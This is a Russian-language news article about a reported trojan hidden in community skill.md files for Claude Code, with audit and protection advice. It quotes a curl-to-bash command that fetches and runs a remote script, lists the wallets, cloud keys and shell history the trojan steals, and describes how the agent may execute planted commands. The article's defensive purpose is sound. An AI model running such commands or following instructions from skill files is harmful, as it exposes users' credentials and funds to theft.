Trojan.JS/CrypoStealz в skill.md файлах Claude Code | Защита 2026 | AiManual
AiManual Logo Ai / Manual.
26 Фев 2026 Новости

Трояны в skill.md файлах: как Claude Code стал мишенью для крипто-воров

Обнаружена масштабная атака через файлы skill.md в Claude Code. Trojan.JS/CrypoStealz крадет данные и криптовалюту. Как проверить проект и защититься.

Находка в открытом репозитории: подозрительный "ускоритель" сборки

Все началось с безобидного pull request в популярный репозиторий с skills для Claude Code. Пользователь предлагал добавить новый skill.md — "Build Optimizer Pro", который якобы ускоряет сборку проектов на 40%. Звучало заманчиво. Но строчка curl -sL https://bit.ly/opt-pro | bash в середине файла заставила одного из ревьюверов насторожиться. Ссылка вела не на GitHub, а на сокращенный URL.

За последнюю неделю, по данным GitHub Security Lab, аналогичные skill.md файлы с замаскированным вредоносным кодом были обнаружены в 17+ публичных репозиториях, связанных с AI-разработкой. В основном — в папках /claude/skills/.

Trojan.JS/CrypoStealz: что делает этот троян на самом деле

Анализ показал, что за привлекательным описанием скрывается вариация трояна, которую антивирусные движки классифицируют как Trojan.JS/CrypoStealz. Его работа проста и цинична. После активации skill в Claude Code (а многие делают это не глядя, доверяя сообществу), скрипт:

  • Сканирует систему на наличие файлов кошельков для криптовалют (MetaMask, Phantom, Exodus).
  • Ищет конфигурационные файлы с ключами доступа к облачным сервисам (AWS, GCP, DigitalOcean).
  • Пытается прочитать историю командной строки, где часто остаются токены и пароли.
  • Упаковывает все найденное и отправляет на сервер-дропзон, маскируя трафик под легитимные запросы к API GitHub.

Самое неприятное — skill.md файлы выглядят абсолютно нормально. Описание на английском, понятный синтаксис, примеры использования. Вредоносная часть спрятана в блоке кода, который якобы «устанавливает необходимые зависимости». Claude Code, особенно в режиме автономной работы, может выполнить эту команду, если пользователь дал соответствующее разрешение.

💡
Это не первая атака на экосистему Claude. Ранее мы разбирали, как через уязвимости в Model Context Protocol (MCP) можно было получить контроль над агентом. Атаки становятся тоньше.

Почему skill.md — идеальная мишень для атаки?

Формат skill.md в Claude Code (и его аналогах вроде Cursor) создавался для удобства. Это markdown-файл, который описывает новый «навык» для AI-помощника: промпты, примеры, команды. Сообщество активно делится такими файлами на GitHub, форумах, в каналах Discord. Проблема в доверии.

Разработчик видит репозиторий с именем «awesome-claude-skills», клонирует его и добавляет skills в свою среду. Проверяет ли он каждый файл? Редко. А злоумышленники этим пользуются. Они создают форки популярных репозиториев, добавляют в них зараженный skill.md с полезным описанием, а затем делают пул-реквесты в оригинальные проекты или просто размещают ссылки в сообществах.

Как показывает практика, централизованного хранилища с проверкой skills нет. Каждый сам кузнец своей безопасности. И своей погибели.

Что делать прямо сейчас: инструкция по выживанию

1 Аудит своих skills

Открой папку, где Claude Code хранит skills (обычно это ~/.config/claude-code/skills или аналогичная). Просмотри каждый .md файл. Ищи подозрительные команды загрузки через curl или wget, особенно со сторонних URL. Вызывают вопросы скрипты, которые пытаются что-то скачать и выполнить без явной необходимости.

2 Никогда не следуй слепо

Если Claude Code предлагает выполнить команду из skill — остановись. Прочитай, что именно он собирается сделать. Отключай автоматическое выполнение скриптов в настройках IDE. Помни, что AI-агенты, как мы писали в разборе CAR-bench, могут быть чрезмерно услужливы и выполнить опасную команду, лишь бы угодить пользователю.

3 Используй сканеры

Перед добавлением нового репозитория со skills прогони его через статический анализатор кода. Да, даже для markdown. Простые скрипты на Python или Bash могут искать шаблоны вроде curl.*bit.ly или | bash. Инструменты вроде Gitleaks или TruffleHog тоже могут помочь.

Важно: На февраль 2026 года в Claude Code версии 2.8.1 появилась экспериментальная функция "Sandboxed Skill Execution", которая запускает команды из skills в изолированном окружении. Включи ее в настройках. Это не панацея, но серьезный барьер.

Контекст: атаки на AI-инструменты становятся нормой

История с Trojan.JS/CrypoStealz — не изолированный случай. Это часть тренда. Хакеры видят, как разработчики все активнее используют AI-помощников, и атакуют именно каналы доверия в этих экосистемах.

Мы уже видели атаки через MCP-серверы, которые превращали Claude в шпиона. Видели промпты-ловушки в OpenClaw, вытягивающие пароли. Теперь очередь за файлами конфигурации.

Мораль проста: чем удобнее инструмент, тем более он уязвим для социальной инженерии. Claude Code создан для того, чтобы минимизировать трение между идеей и кодом. Хакеры используют это же трение, чтобы протолкнуть свой вредонос.

Что будет дальше? Скорее всего, мы увидим ответные шаги от Anthropic — возможно, репозиторий skills с верификацией или встроенный сканер. Но пока каждый разработчик — сам себе охранник. Проверяй навыки, как проверяешь зависимости в package.json. Доверяй, но верифицируй. Иначе твой следующий skill.md может оказаться прощальным письмом для твоего кошелька.

Подписаться на канал

На главную